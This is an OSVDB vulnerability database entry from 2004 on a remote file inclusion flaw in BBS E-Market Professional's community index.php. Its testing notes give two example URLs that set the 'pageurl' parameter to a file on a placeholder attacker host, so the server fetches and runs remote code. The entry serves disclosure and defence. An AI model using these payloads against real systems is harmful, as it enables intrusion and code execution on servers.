BBS E-Market Professional index.html Arbitrary Command Execution

2004-09-07T00:00:00
ID OSVDB:9802
Type osvdb
Reporter Ahmad Muammar (y3dips@echo.or.id)
Modified 2004-09-07T00:00:00

Description

Manual Testing Notes

http://[victim]/becommunity/community/index.php?pageurl=http://[attacker]/arbitrary.txt?
http://[victim]/becommunity/community/index.php?from_market=Y&pageurl=http://[attacker]/arbitrary.txt?

References:

Vendor URL: http://www.nt.co.kr/
Security Tracker: 1011204
Secunia Advisory ID: 12509
Related OSVDB ID: 9803
Other Advisory URL: http://echo.or.id/adv/adv06-y3dips-2004.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0078.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0494.html